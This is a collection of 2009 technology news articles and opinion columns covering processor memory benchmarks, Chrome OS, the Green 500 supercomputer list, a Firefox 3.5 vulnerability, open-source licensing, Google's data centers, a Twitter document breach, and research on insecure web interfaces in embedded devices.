Corder's home-done Stream benchmark tests (http://www.advancedclustering.com/company-blog/stream-benchmarking.html) were done on exactly the same iron as the Linpack tests, and for good measure, Corder tossed in some numbers for older quad-core Xeons and Opterons to show how much better the new chips are versus the old.

The Nehalem EPs really cleaned the Istanbul's clocks on this test. Using 1.33 GHz DDR3 memory, the server using the X5570 processors was able to 37,122 MB/sec of bandwidth on the Stream test, while the machine equipped with 1.07 GHz memory modules hit 32,770 MB/sec and one using 800 MHz memory could handle 25,490 MB/sec. A Pinnacle server equipped with the earlier "Harpertown" Xeon 5400s - quad-core chips using the old frontside bus architecture and 800 MHz DDR2 main memory - could only deliver 9,776 MB/sec of bandwidth on the Stream test, and dropping down to 667 MHz memory pushed performance down to 6,102 MB/sec.

By contrast - and this is a big contrast - the Istanbul-based Pinnacle server using 800 MHz DDR2 main memory - as fast as it gets - topped out at 20,534 MB/sec of memory bandwidth on the stream tests, which was actually a little bit lower than the results ACT saw with a Pinnacle server equipped with quad-core "Shanghai" Opterons, which came in at 20,687 MB/sec. A server using the older quad-core "Barcelona" Opterons and 667 MHz DDR2 main memory was able to deliver 16,965 MB/sec on Stream.

As Intel has promised, ACT confirms that the Nehalem EP chips and their new QuickPath Interconnect bus architecture delivers nearly four times the memory bandwidth as its Harpertown predecessors, and nearly double the memory performance of the current crop of AMD Opterons. And there is nothing AMD can do about it until it switches to DDR3 main memory early next year (http://www.theregister.co.uk/2009/04/22/amd_istanbul_forward/) with the "Magny-Cours" and "Lisbon" kickers to the Istanbuls.

AMD will be offering the G34 chipset with four DDR3 memory channels per socket (up to twelve DIMMs) and the C32 chipset with two channels per socket (up to four DIMMs). AMD's plan is to offer two different kinds of two-socket servers: one where memory bandwidth is key (that's the G34) and one where cheaper price and floating point or integer power are more important (that's the C32). AMD has the right idea. But it really needs this architecture to be here now to blunt Intel's considerable memory bandwidth advantage. ®

by Eric Knorr

I'm not the first to say this, but the idea behind Google's forthcoming Chrome OS reminds me of the Network Computer (NC), a driveless desktop unveiled by Larry Ellison in 1996. Back then, here's what I wrote about NC: "Do you really want to do without a floppy, hard, or CD-ROM drive? Be unable to compute – or even access your data – when the server goes down? Watch performance slow to a crawl during peak hours? An Internet appliance has everyman appeal at first glance; but on closer inspection, it's two steps back to those bad old mainframe days when Big Brother owned the computer, not you."

Now, 13 years later, Google has raised a similar proposition: an OS that pretty much dictates that you'll be living your computing life on the Internet and storing your data and preferences there, too. So let's break down that hoary old critique of mine and see if it still applies.

First of all, when I knocked the NC for lacking local storage, I was referring mainly to performance. At the time, 28.8bps modems were typical and putting personal storage at the end of such a slender connection seemed like a really bad idea. Now, some Chrome OS computers will have solid-state drives or hard disks, and some may only have a cache (who knows?), but it doesn't matter much. You'll be computing in the cloud. Broadband plus a fast JavaScript engine equals good enough performance, so score one for Google.

Now we come to the part about being unable to compute or access your data when the "server" goes down. (It could be the "server" or it could be the connection, but whatever.) Well, I imagine some implementation of Google Gears will be included, so you'll have some limited offline access to data. But more to the point, I can't remember the last time my work or home broadband connections went down and Google doesn't have outages. So Google gets another two points.

The reference to "peak hours" is a legacy of the days when mainframes or "online services" would choke on too many simultaneous users. But I believe in the magic of Google's hyperscalable server cloud, so I have to give 'em another one.

Which leads us to the final "Big Brother," point. Google is already the gatekeeper of the Internet; should it also be the keeper of your data? It does seem to be time to trot out the old cliche about absolute power corrupting absolutely. At the very least, I can't imagine enterprises ceding their data to Google (the SLAs on Google Apps, for example, aren't exactly business class).

But a near-zero-config thin client, with all my data and preference available from any Chrome OS device, is an awfully appealing idea. And if I had my choice, who would I want to play host? Oracle? Microsoft? IBM?

Well, I'm not ready to hand over the entire casket of family jewels to Google, either. But the technical hurdles to a modern-day NC have largely been vaulted, and HTML 5 and CSS 3 should enable desktop-class apps in the browser. The fact that I'm even considering what data I might or might not "give up" – and that a simple announcement implying no new groundbreaking technology has caused such an avalanche of speculation – is testament to the power of the Google brand. Should it be any more powerful than it is?

by Kelvin Low

Remember the gender recognition system we saw at the Singapore-based CommunicAsia trade show last month? Well, those zany Japanese have a more creative way of implementing a somewhat similar face recognition software.

Putting a new spin on the phrase "service with a smile," employees of Keihin Electric Express Railway will need to check their smiles in every morning. The software will determine the quality of their smile, and display visual alerts if they don't look happy enough.

According to an article in the Mainichi Daily News, the software assigns smile values to various parts of the face. It then adds those values up and determines a score.

The device recognizes eye movements, lip curves, and wrinkles. If an employee gets a low score, messages such as "You still look too serious" or "Lift up your mouth corners" will be displayed on the screen.

Maybe it seems cruel, but to us it's still a lot more humane than not having chairs at work. Or maybe Keihin Electric Express Railway was inspired by the ancient Chinese proverb "Hide your dagger behind a smile"? We wouldn't want to provoke them to find out.

by Timothy Prickett Morgan

The Top 500 ranking of the world's supercomputers, put out by a group of performance-loving nerds, came out a few weeks ago. Now a few efficiency-loving nerds have added power-consumption figures to the Top 500, resorted the list, and have created the Green 500 supercomputer ranking.

The pursuit of hundreds of teraflops and now tens of petaflops comes at a price, and that price includes power consumption and heat dissipation. Some supercomputer architectures are more power-efficient than others, as the Green 500 rankings clearly show.

The Top 500 list is compiled by Erich Strohmaier and Horst Simon of the Lawrence Berkeley National Laboratory, Jack Dongarra of the University of Tennessee, and Hans Meuer of the University of Manheim. The list has been published twice a year for nearly 17 years, and Dongarra has Linpack Fortran benchmark test results that were run on Jacquard looms back in the 19th century.

OK, I'm exaggerating. Slightly.

The Green 500 list is a much more recent development. Created by Wu-chun Feng and Kirk Cameron of Virginia Tech, this is the fifth ranking, but only the third one that has been made public.

The most efficient supercomputer on the Green 500 list is a fairly modest 2,016-core cluster based on IBM's PowerXCell 8i processors (in its QS22 blade servers) that employs InfiniBand to lash the server nodes together.

This machine, installed at the University of Warsaw's Interdisciplinary Centre for Mathematical and Computational Modeling, is rated at a modest 18.6 teraflops, but because it only burns 34.6 kilowatts of electricity, it comes in at 536.2 megaflops per watt. And that's thanks in large measure from its using the new 4GHz Cell chip all by itself instead of the 3.2GHz variant paired with dual-core Opteron processors, as do a number of other efficient supers.

Because Warsaw's Cell-based machine - which ranked number one in the November 2008 Green 500 list as well - is so small in terms of teraflops, it probably won't be on the November 2009 list of Top 500 supers, a fate that will drop it from the related Green 500 rankings.

It won't be the first to be so bumped. Three Cell-based machines installed at Spanish oil company Repsol YPF that once ranked at the top of the Green 500 list disappeared from the June 2009 ranking because they were only rated at 14 teraflops, but they delivered 530.33 megaflops per watt since they only burned 26.4 kilowatts of juice.

It looks like it's time for the Top 500 and Green 500 people to start building a larger list so that efficient machines don't get shaken out of the mix.

As was the case in the prior two Green 500 rankings, IBM's hybrid supers comprised of Opteron LS21 blades and QS22 Cell blades dominate the energy-efficient rankings, holding spots two through four.

Notably, IBM's "Roadrunner" hybrid Opteron-Cell super installed at Los Alamos National Laboratory, the first machine to break the one-petaflop barrier, is ranked number four on the Green 500 list, showing that Big Blue can build small machines that deliver good energy efficiency, then scale them up and still offer efficiency.

The Roadrunner box, which is rated at 1.1 sustained petaflops on the Linpack test, burns 2.5 megawatts of electricity for an efficiency of 444.9 megaflops per watt. The smaller Opteron-Cell clusters ranked above Roadrunner on the Green 500 list installed at IBM's own benchmarking center and at Los Alamos are rated at 458.3 megaflops per watt.

A whole bunch of BlueGene/P massively parallel clusters of various sizes and installed all over the world occupy slots six through 19 on the Green 500 list, with efficiencies that range from 364 to 371.7 megaflops per watt. The new iDataPlex machines from Big Blue (which have some attributes of blade and rack servers) hold some spots in the list at around 270 megaflops per watt.

The most interesting new machine on the Green 500 list is the Grape-DR cluster, which is a custom supercomputer based on a 256-core chip that was developed by the University of Tokyo, the National Astronomical Observatory of Japan, the Institute of Physical and Chemical Research, and telecom giant NTT.

The Grape-DR machine, which is installed at the observatory, is comprised of 8,192 Grape-DR chips running at a modest 330MHz and running CentOS Linux. Each, however, delivers 10.3 gigaflops of oomph, allowing the Grape-DR cluster to hit just under 22 teraflops with nearly 2.1 million cores.

The Grape-DR cluster, which is but the latest in a line of custom supers based on custom chips designed in Japan since 1992, only burns 51.2 kilowatts, allowing it to boast a rating of 428.9 megaflops per watt on the Green 500 ranking. Its number-five position slots it right between IBM's hybrid Opteron-Cell boxes and the wall of BlueGene/P machines.

The most efficient x64-only boxes on the list are based on Intel's new Xeon 5500 Nehalem EP processors, and include not only the IBM iDataPlex boxes but also a machine ranked at number 20 built by NEC for the University of Stuttgart, as well as two boxes built by Atipa for two different atomic labs in the States that almost certainly will be knocked from the list next time around if they're not upgraded.

Cray XT4 and XT5 and SGI Altix ICE parallel supers, as well as a mix of BlueGene and iDataPlex machines from IBM, dominate the top 100 on the Green 500 list, along with a smattering of clusters built from x64 servers from Dell, Sun Microsystems, and Fujitsu. There is not one HP machine in the top fifth of the Green 500 rankings.

Averaged across the entire Green 500 list, the researchers who put together this power ranking say that the efficiency of the machine increased by 10 per cent, from 98 to 108 megaflops per watt, since the November 2008 ranking, while the aggregate power of all the boxes on the list also increased by 15 per cent, from 200 to 230 megawatts.

The power bill is not going down so much as the performance levels are going up.

In the November 2008 Top 500 and Green 500 lists, the aggregate performance of the machines ranked was just under 17 petaflops, but in the June 2009 lists it rose to 22.6 petaflops. In general, Wu-chun and Cameron say that there are more machines above the 200 megaflops per watt threshold and fewer machines below the 50 megaflops per watt level. Moreover, quad-core and six-core processors are helping to boost the energy efficiency of clusters.

The absolute worst supercomputer on the Green 500 ranking is installed at an unnamed IT service provider that has six different blade server clusters based on various generations of x64 blade servers from HP. The cluster in question, which is ranked at 311 on the Top 500 supers list, has 8,192 Opteron cores using 2.4GHz dual-core Opterons and is rated at just over 21 teraflops. Unfortunately, the Green 500 power experts reckon that this box burns 1.6 megawatts of juice, giving it a rating of a hair over 13 megaflops per watt.

That's twice as bad in terms of energy efficiency as the Sun Tsubame Opteron blade cluster located at TiTech in Japan, which uses ClearSpeed co-processors to boost the number-crunching power, but which nonetheless ranks at an embarrassing 494 on the Green 500 list because it consumes 3.3 megawatts to deliver its 87 teraflops, for a rating of 26.4 megaflops per watt.

The Cray XT4 installed at the University of Edinburgh also ranked poorly in terms of energy efficiency, with the 54.65 teraflops Opteron cluster burning 2.6 megawatts of juice and delivering only 21 megaflops per watt. ®

by Gregg Keizer

Mozilla yesterday confirmed the first security vulnerability in Firefox 3.5, and said the bug could be used to hijack a machine running the company's newest browser.

A noted Firefox contributor called the situation "self-inflicted," and said it was likely that the hacker who posted public exploit code Monday became aware of the flaw by rooting through Bugzilla, Mozilla's bug- and change-tracking database.

The vulnerability is in the TraceMonkey JavaScript engine that debuted with Firefox 3.5, said Mozilla. "[It] can be exploited by an attacker who tricks a victim into viewing a malicious Web page containing the exploit code," the company's security blog reported Tuesday.

Secunia, a Danish security company, rated the bug "highly critical," the second-highest threat ranking in its five-step system, and added that the vulnerability is in TraceMonkey's processing of JavaScript code handling "font" HTML tags.

Older versions of Firefox, including Firefox 3.0, are not vulnerable, according to a message posted by Asa Dotzler, Mozilla's director of community development, in a comment to the company's blog.

"Mozilla developers are working on a fix for this issue and a Firefox security update will be sent out as soon as the fix is completed and tested," said that same blog.

In lieu of a patch, users can protect themselves by disabling the "just-in-time" component of the TraceMonkey engine. To do that, users should enter "about:config" in Firefox's address bar, type "jit" in the filter box, then double-click the "javascript.options.jit.content" entry to set the value to "false." The popular NoScript add-on will also ward off attacks.

The hacker who published exploit code on the milw0rm.com malware site Monday was not the first to uncover the vulnerability: Mozilla developers first noted the flaw last Thursday, and were in the middle of working on it when the attack code appeared.

"Looking at the exploit code and our test cases, I think this is self-inflicted and we should have hidden the bug earlier," argued Andreas Gal on Bugzilla. Gal is a project scientist at the University of California, Irvine, where the technique called "trace trees" was developed. Firefox 3.5's TraceMonkey engine is based on that technique, and builds on code and ideas shared with the open-source Tamarin Tracing project.

Another contributor agreed. "It would seem that the milw0rm exploit code is based on the test cases for this bug," said someone identified only as "WD" in the same Bugzilla thread. "When you look at the crash details in a debugger, it's pretty clear that it's exploitable with a heap spray to the access violation address in question."

The fix has been slated for Firefox 3.5.1, a fast-track update originally scheduled to release in the last two weeks of this month.

That update will be accelerated to plug the just-gone-public hole, said Daniel Veditz, a security lead at Mozilla. "[The bug] was checked in yesterday, a few hours before we learned of the milw0rm posting," Veditz said Tuesday night in a comment on the Mozilla security blog. "This fix was going to be in the 3.5.x update we had scheduled for the end of July, but obviously now we have moved up the schedule for release."

by Matt Asay

If most developers contribute to open-source projects because they want to, rather than because they're forced to, why do we have the GNU General Public License?

That's the question that hit me last night as I tried to sleep in the shadow of Richard Stallman's MIT. Stallman, of course, originated the GPL, a brilliant way to turn copyright on its head in order to force software to remain open.

But in the process, did Stallman simply create an alternative way to release proprietary software?

I'm not trying to be cute here. Think about it. If you you want to maximize adoption and reuse of your software, why wouldn't you use Apache? Perhaps because you don't like the thought of someone using your free software in a proprietary product?

"I would actually rather nobody use my software than be in a situation where everyone is using my gear, and nobody is admitting it," wrote Zed Shaw, creator of a popular library and Web server for Rails called Mongrel.

Shaw, and perhaps other coders, have turned to the GPL as a way to protect their software from use they deem objectionable. But isn't this precisely what the proprietary software licenses do? The only difference is that the GPL forces code to be open, rather than closed.

Are the two approaches so very different? The effect - blocking undesirable use of one's software - is largely the same.

After 10 years in open source, I'm increasingly of the Apache-licensing persuasion because I'm starting to concur with open-source luminary Eric Raymond that "the GPL is unnecessary...(and) is also a confession of fear and weakness."

If I'm mostly concerned about adoption, Apache promises to be better than the GPL for all the reasons stated by Daniel Jalkut in his excellent ode to Apache.

And if I'm concerned about protection, then why not simply use a proprietary license--one that doesn't scare opposing legal counsel?

With the Web making open-source licensing largely irrelevant, anyway, it's a good time to evaluate the merits of the two dominant open-source-licensing approaches. For this moment in time, they're essentially equivalent, at least to end users and Web developers, neither of which is required to contribute back derivative works.

Indeed, I believe that one of the primary reasons that Linux, MySQL, Lucene, Hadoop, and other Web-oriented technologies have thrived in the past few years is that they have basically come legal-encumbrance-free.

Would Google have built its server infrastructure with Linux if it had been required to contribute all its software back? Almost certainly not. Yes, it has elected to contribute back to MySQL and others when it was advantageous to do so, but I think that Affero GPL, which translates the GPL's provisions to network-hosted software, would have effectively killed the utility of MySQL, Linux, and other open-source technologies for Web titans like Google, Facebook, and others.

In short, perhaps the best thing that could have happened to open source in the past few years is the increasing relevance of its code due to the decreasing relevance of its licensing. More adoption due to fewer controls.

Developers don't contribute to open-source projects out of force. They do so out of interest, desire for recognition, and other reasons. Once you take force out of the equation, the GPL loses its relevance except as a tool to protect against competition...which proprietary licensing perfected long ago.

For those who worry about the world being closed off behind proprietary licenses, it's not going to happen. The software world has been opening up, though not always at the pace some open-source advocates would prefer. On this point Tim O'Reilly has correctly argued:

If you close things off, eventually, you lose. This is why one of my slogans is, "Create more value than you capture." As long as people are doing that, I don't care whether they're trying to capture some value (through proprietary licensing).

In other words, people don't have to be forced into openness. It happens out of natural, selfish desires. Given the history of humanity, that's probably a more dependable basis for business strategy than an expectation of charitable donations through code contributions.

So, wither the GPL? I'm asking a sincere question to which I have hunches but no definitive answers. I'd love to hear your thoughts.

by Cade Metz

The cooling system inside Google's Belgium data center has no chillers. It uses nothing but outside air - so-called "free-cooling" - to keep temperatures down. And if the Belgian air gets too hot, Google shifts the data center's compute loads to other facilities.

As we reported late last month, Google senior manager of engineering and architecture Vijay Gill alluded to this chiller-less setup during a cloud-happy tech conference in San Francisco. And our piece sparked a follow-up story from our friends at Data Center Knowledge.

According to the site, Google openly discussed its chiller-free facility this spring during a data-center summit inside the Mountain View Chocolate Factory. The Belgium climate can provide free cooling for all but about seven days of the year, the company says, and during those hot summer days, Google offloads the facility's tasks to other custom-built data centers, which now number about 36 worldwide.

The free-cooling idea is hardly unique - the likes of Microsoft and Yahoo! are also working to cut energy costs by using alternative cooling sources - but Google isn't even using chillers as a fall-back.

Google tends to operate its data centers at over 80 degrees Fahrenheit - well above the norm - and according to one former employee, Intel provides the Chocolate Factory with chips that are better able to withstand heat than garden variety Chipzilla processors. But it's unclear how Google's free cooling setup operates. The company did not immediately respond to our request for comment.

Speaking at Structure 09, the wonderfully-witty Vijay Gill seemed to indicate that when there's a temperature spike in the chiller-less data center, its top-secret infrastructure can respond without human intervention.

"You have to have integration with everything right from the chillers down all the way to the CPU," he said. "Sometimes, there's a temperature excursion, and you might want to do a quick load-shedding - a quick load-shedding to prevent a temperature excursion because, hey, you have a data center with no chillers. You want to move some load off. You want to cut some CPUs and some of the processes in RAM."

And he hinted that Google can (almost) instantly shift loads from one data center to another as if moving data between servers. Google likes to think of each data center as one big machine. The Datacenter as a Computer: An Introduction to the Design of Warehouse-Scale Machines is the title of the now-famous paper.

"How do you manage the system and optimize it on a global level? That is the interesting part," Gill continued. "What we've got here [with Google] is massive - like hundreds of thousands of variable linear programming problems that need to run in quasi-real-time. When the temperature starts to excurse in a data center, you don't have the luxury to sitting around for a half an hour...You have on the order of seconds."

But when asked if this technology is in place today, Gill responded in typical Google fashion. "I could not possibly comment on that," he said. Likewise, when The Reg contacted Google today about its chiller-less setup, the company did not immediately respond.

In a March interview with Data Center Knowledge, however, Google senior vice president of operations Urs Holzle indicated that the company uses manual tools for load shifts between data centers. "Teams regularly practice failing out of or routing around specific data centers as part of scheduled maintenance," he said. "Sometimes, we need to build new tools when new classes of problems happen."

And if Google does have automated tools doing this sort of thing, you have to wonder how well they're working. Earlier this year, two much-discussed Gmail outages involved Google shifting loads between data centers. ®

by Jon Brodkin

A hacker has reportedly obtained and distributed more than 300 confidential documents pertaining to Twitter's business affairs. The documents were reportedly stored on Google Apps.

The hacker apparently accessed documents with potentially sensitive information about Twitter employees, company finances, partner agreements, and other topics, and forwarded the documents to media outlets such as TechCrunch, which reported on the data breach Tuesday.

On how the breach occurred, TechCrunch's Michael Arrington writes that "the original security hole seems to be Google, via Google Apps for your Domain. Some passwords were guessed and things started to fall apart from there. Most (or all) of these documents were downloaded from Google's servers."

The exposure has raised ethical questions about whether any or all of the exposed documents should be published. TechCrunch said it would refrain from posting documents relating to individuals who interviewed at Twitter and others that show "floorplans and security passcodes to get into the Twitter offices." But TechCrunch said it will publish some documents "showing financial projections, product plans, and notes from executive strategy meetings."

The exposure is also certain to raise questions about cloud-based services, both in terms of whether the services themselves contain inherent security flaws and whether customers are too trusting and aren't using strong enough passwords.

by Matt Asay

Just as Amazon and Google are obliterating profit margins for old-school publishers, so, too, is open source putting the squeeze on them, whether in cloud computing or in search or...you name it. As the world digitizes, there's a mad rush to commoditize everyone else's business. This is good for consumers (low prices!) but not so good for vendors (low margins!).

The problem (and promise) of digitization is, of course, "free." Everyone loves to pay "free," but few really enjoy selling it. Or competing with it.

As Bill Gurley suggests: "The key question for anyone in business is, 'Can someone do what you do for free?' If the answer is 'yes' you have a problem." In a digital world, that "problem" is wreaking havoc on an increasing array of industries.

The problem, however, isn't "free.'" It's that old businesses persist in trying to charge for goods that others give away.

Twitter, for example, may not be making much money from its service, but a host of companies are starting to derive considerable cash from the sale of ancillary software or services, as TechCrunch points out.

Or take the media industry. As Andrew Savikas persuasively argues, media continues to think it's a content business, while the world believes it's a services business.

JP Rangaswami illustrates why:

What if the troglodytes finally began to realise that customers were scarce and digital music was abundant? What if they finally began to realise that downloads were an excellent way to advertise scarce things like concerts and physical memorabilia, as Prince figured out?

And what if the customers have given up and moved on, from the download to the stream?

It was never about owning content. It was always about listening to music.

It was never about product. It was always about service.

The customer is the scarcity.

That scarcity only appears to grow as digital goods proliferate. So much content seeking audience with comparatively few consumers. Something has to give.

That something is, first of all, old business models premised on selling an abundantly available good as if it were scarce. The real model is to foster abundance while selling the scarcity that naturally accompanies it. Google gives away search so that it can help you narrow that search with ads; Red Hat encourages open-source development so that it can boil down that teeming mass of uncertainty to a certified, stable build of Linux; and so on.

Some in the software world don't get this. Microsoft CEO Steve Ballmer can repeat ad infinitum that "We just keep coming and coming and coming" with the same strategy, the same software, the same everything.

But eventually it won't, because even Microsoft's bank balance and "Tenacious. Tenacious. Tenacious" approach can't withstand a perennial battle with 'free' (or enterprise customers' apparent indifference to more of the same). Not unless it can re-learn how to make 'free' work for it, as it has with SharePoint.

The same is true for the media industries as well as new-school software companies like Google. Today's profit center is almost certainly going to be given away by one's competitor.

That's why creative destruction must be creative to pay off. It's what drives innovation. No one is entitled to its business model forever, for which consumers should be very, very grateful.

by Dan Goodin

Forget mis-configured Apache servers and vulnerability-laden Adobe applications. The biggest security threats to business and home networks may be the avalanche of webcams, printers, and other devices that ship with embedded web interfaces that can easily be turned against their masters.

The web interfaces are designed to make it easy to manage the devices by allowing people to use a readily familiar medium to change settings such as file names and IP addresses. But there's a catch: The low-cost gadgets were never designed to withstand attacks, even though they interact with some of the most sensitive parts of a computer network, says a team of researchers at Stanford University that tested 21 devices made by 16 different manufacturers.

"We didn't find a single secure device," said Hristo Bojinov, a PhD candidate at Stanford's Computer Security Lab, who plans to present the findings later this month at the Black Hat security conference in Las Vegas. "It tells us that it's a long tail that's completely overlooked right now."

The device that posed the highest number of threats was NAS, or network-attached storage, units, which were susceptible to all five attack classes considered in the study.

For instance, attackers can sabotage NAS units made by one vendor (The Register agreed not to name any specific manufacturers or models in this article) by doing nothing more than entering javascript commands when trying to log in to the device. From then on, the device will execute XSS, or cross-site scripting, attacks against network admins each time they view a device log that stores the wayward login attempts.

Similarly, attackers can manipulate SMB, or server message block, commands, to rename files on a NAS device so they contain malicious javascript. The Stanford team has dubbed such exploits cross-channel scripting attacks because they use a non-web-based channel such as the file transfer protocol to store arbitrary scripts that, when viewed in a web browser, can expose the admin to serious threats. Four of the five NAS manufacturers studied in the report were vulnerable to them.

Other devices that are vulnerable to cross-channel attacks include network switches, routers, photo frames, voice over internet protocol phones, and so-called LOM, or lights out management, systems for remotely managing servers and other network equipment. Other attack classes detailed in the study included CSRF, or cross-site request forgeries, and unauthorized access of files or device resources.

"What we're talking about here is a fairly global problem," said Bojinov. "Pretty much all vendors we have looked at are affected by this."

The researchers have also modeled web-based exploits that invoke CSRF attacks to plant an ever-present "ghost" in certain models of photo frames that allow people to use the internet to remotely change the images being displayed. From then on, the device is under the spell of the demon, which can be programmed to send a copy of each picture stored, the times the device is accessed and other potentially sensitive data.

The findings are significant for a couple reasons. First, once infiltrated, the devices will continue to attack because the malicious scripts reside in configuration pages, device logs, and other pages. Even if an attacked PC is later disinfected, the device may continue to clobber new victims. What's more, these devices are generally invisible to anti-virus and other security programs.

Second, the number of electronic devices being shipped with web interfaces has snowballed and is only getting bigger. In the next few years, the number of such gizmos attached to the net will outnumber servers, the researchers say.

And yet few if any device manufacturers supply defenses against such attacks.

"At a high level, usually the problems can be fixed by being very careful about escaping the state that device stores, and presents," Bojinov says. "However, given the fact that it is so hard to keep track of all input and output, it is too much to ask each vendor to fix to the problem directly."

As a result, the research team - which also includes Dan Boneh, head of the Applied Cryptography Group in Stanford's Computer Science Department, and Elie Bursztein, a post-doctoral researcher at the Stanford Computer Security Lab - are considering whether it makes sense to build a set of lightweight tools that vendors could include in their wares.

One approach is the creation of browser extension the team calls a "sitefirewall" that would prevent attacks from using the browser to leak data outside an intranet. The team plans to release a proof-of-concept tool later this year. A second approach is a framework for developing embedded web interfaces that fixes the most common implementation problems.

by Roger Grimes

Google's plan to release a Chrome-based OS next year has garnered the expected fanfare that comes with anything the company announces. I've also seen articles in which people at Google are quoted as saying the OS will be free from malware and immune to malicious hackers. My gut feeling is that these folks were misquoted. I don't think anyone with serious experience in this field would make that sort of claim - but I could be wrong.

Whether or not they said it, the question remains: Is it truly possible for the search giant to accomplish what no other company has and release a perfectly secure OS? The answer: Probably not. (For the sake of full disclosure, I'm a security architect at Microsoft.)

For starters, the best indicator of future behavior is past behavior. Every software vendor who has promised perfect security has failed to deliver. Who can forget Oracle CEO Larry Ellison's pledge of "unbreakable software" ? That was hundreds, if not thousands, of patched bugs ago. Unlike Oracle's offerings, Chrome OS will be available to and used by the general public, making it a huge target for malicious hackers and purveyors of malware. That alone renders the prospect of flawless security all but impossible.

Second, I don't know of a Google product to date that has not had its share of bugs. Even Google Chrome, the "most secure browser ever," has had at least eight discovered vulnerabilities in its very short life - and with the browser's very small market share. If Google Chrome were to gain market share, more vulnerabilities would naturally emerge. No software has ever escaped that fact.

Secure software is static software
But let's say that Google achieves the near-impossible, what no one else has done, and makes a perfectly secure OS. One of the key challenges for any software title is that as it becomes more popular, it must become more functional. Security alone does not make a product popular. Otherwise, software such as OpenBSD or anything written by Dr. D. J. Bernstein would have a much higher install base. These products are well-regarded for being extremely - though not perfectly - secure. Perhaps these products haven't gained broader acceptance because - I 'm waiting for the flame mail - they don't offer the functionality and experience that most users really want.

If a company fails to add functionality and features to its wares, its competitors will grab its customers.

However, adding new functionality and new features requires new code, which in turns increases complexity and the chances for security bugs.

For example, Adobe Acrobat was relatively secure when it simply read PDF text documents. To attract more customers and remain competitive, Adobe added a bunch of new features, such as the ability to run JavaScript and participate in encryption. By no small coincidence, Adobe Acrobat now has lots of security patches. You can say the same of any popular app.

Further, even if Google somehow manages to crank out a perfectly secure OS, it will still need to rely upon other organizations' software to work. That, in turn, will almost certainly create chinks in the OS's armor. For example, almost every Internet product relies on DNS, which has proved extremely hackable. Hack that, and you hack everything that relies on it, including otherwise secure browsers and OSes.

Beyond relying on DNS, how will the Google OS and browser render documents and content such as PDFs, Macromedia Flash files, iTunes music, and all other code and content that makes up the rich Internet experience? Google developers will have a hard time delivering all that functionality themselves. They would have to perfectly code every (or at least the most popular) content-type rendering engines. More than likely, Google will allow other vendors' products to interact with their products, and that brings up dozens of security issues in a given month.

I'm even ignoring for the moment the reports that the Google OS will be a Linux variant. Linux itself has many kernel bugs a year. Google Chrome, the browser, relies upon other components (such as Web Toolkit) with have their own vulnerabilities.

There are other hard questions: How will people be able to save content between sessions or send each other files? How will Google be able to perfectly distinguish between malicious and legitimate file attachments when no other company has been able to do it?

Allow users to save content on the local machine and you've opened up a potential security hole. Only allow objects to be saved in the cloud, and the cloud becomes the target. Heck, most of the cloud vendors are still trying to come to grips with what securing the cloud even means, much less having a perfectly secure cloud.

Google can only accomplish a perfectly secure OS by coding with zero bugs (which has never been done and will never be done), by interacting with perfectly secure third-party products (which don't exist), and/or by providing less functionality and customization to its customers. That's a tall order and a prescription for strong competition, because no matter what we believe, customers really don't want perfectly secure software - at least not at the expense of rich features.

To its credit, Google does have a better-than-average chance of making a relatively more secure OS. Google developers don't have the incredible backward-compatibility issues that Windows, Linux, and BSD product teams must deal with. Google has a chance to strike out on its own and support what it wants want to support. The company did something similar with the Chrome browser. But again, Google's previous security track record indicates that perfect security – even with less functionality – will be difficult.

A Google Chrome OS could be successful for a lot of other reasons, and I applaud Google for its initiative and innovation. (By the way, congrats for Gmail coming out of beta! ) I'm always a believer in more competition. It improves everyone's product and usually benefits the customer. But after spending 23 years in the computer industry and hearing the repeated false promises of "perfect security," please excuse me if I'm skeptical.

by George Crump

When it comes to storage encryption, the primary concern is protecting data as it leaves the trusted environment of your data center. There are three primary cases when this occurs; users taking data out of the environment on USB memory sticks, external hard drives, and laptops; data being moved offsite for long-term storage or protection from disaster; and when storage systems are decommissioned. There is also the case of storage being encrypted as an extra level of security within the trusted environment. In all cases, encryption needs to be applied in a way that is effective yet unobtrusive to business operations.

User Storage

Today's workforce is becoming more and more mobile, with employees working from home or on the road via laptops and USB drives. Given the risk of the devices being lost or stolen, there must be safeguards put in place to make sure that the data can't be read.

"At the device level, companies and government agencies are requiring that users utilize portable storage devices that utilize encryption," says Gary Streuter, vice president of marketing at CMS Products (www.cmsproducts.com). "These devices basically work by setting a password for the device so that when it is plugged in to a USB port, the user is prompted for the password, [and] after so many—typically five—failed attempts, access to the device is denied, and in some cases it will erase itself."

For laptops, there is the typical security of logging in to the system, but Streuter advises that may not be enough. "Often users will either have their systems set for auto-login or create very simple passwords that are easy to defeat," he says. For laptops, shared computers at home, and even shared drives on a corporate file server, Streuter recommends the use of a software application that can encrypt the data on laptop drives or in folders on shared systems to provide a second challenge for access.

These systems can also be set for a time-out value that will require reauthentication after a period of inactivity, putting the system to sleep or shutting it down. Such software protects highly sensitive data from an internal breach as well as a user walking away from a machine and forgetting to log out.

Data Center Storage

The primary focus for encrypting data center storage should be as it leaves the trusted environment either for long-term storage or when it is decommissioned. Encryption often is not effective against internal threats such as those from internal IT staff or external maintenance providers because they have been authorized and placed in the trusted environment.

Jose Carreon, product marketing manager for security technologies at Brocade (www.brocade.com), suggests that primary storage should be the critical focal point for storage managers. "Primary storage is always the most important to encrypt [because] it is the storage layer where most of the dynamic sensitive data resides," he says. "For example, assume credit card information that gets accessed and processed every second of the IT working day . . . has to be protected while in transit and at rest."

According to Kevin Bocek, director of product marketing for Thales Information Systems Security (iss.thalesgroup.com), there are four primary ways that users can encrypt data center storage in transit or at rest: application-based encryption, which encrypts data as the application writes it to storage; host bus adapter-based encryption via a storage card, which encrypts data as it leaves the host on its way to storage; SAN-based encryption, which encrypts data as it enters the storage fabric; and encryption at the array or drive level.

"Each of these methods has its advantages," says Bocek. "Encrypting at the application level makes sure that data is encrypted as it is written to the storage system, but applications need to be rewritten to take advantage of that; additionally, it is sometimes difficult to determine what data should and should not be encrypted. In similar fashion, HBA-based encryption is ideal if just a few applications on a few servers need encryption, but in today's environment, with server virtualization, it may be hard to isolate the application. Additionally, the cost of replacing cards could be expensive if many servers need encryption. Encrypting in the storage fabric provides [broader] encryption without having to change the application or the HBA cards. Finally, storage again can encrypt everything broadly, but it requires replacing the current tape or storage solution."

Bocek believes that for many customers, encrypting at the fabric through either a specific appliance or switch provides the right balance of broad encryption without disruption or replacement of key components in the environment.

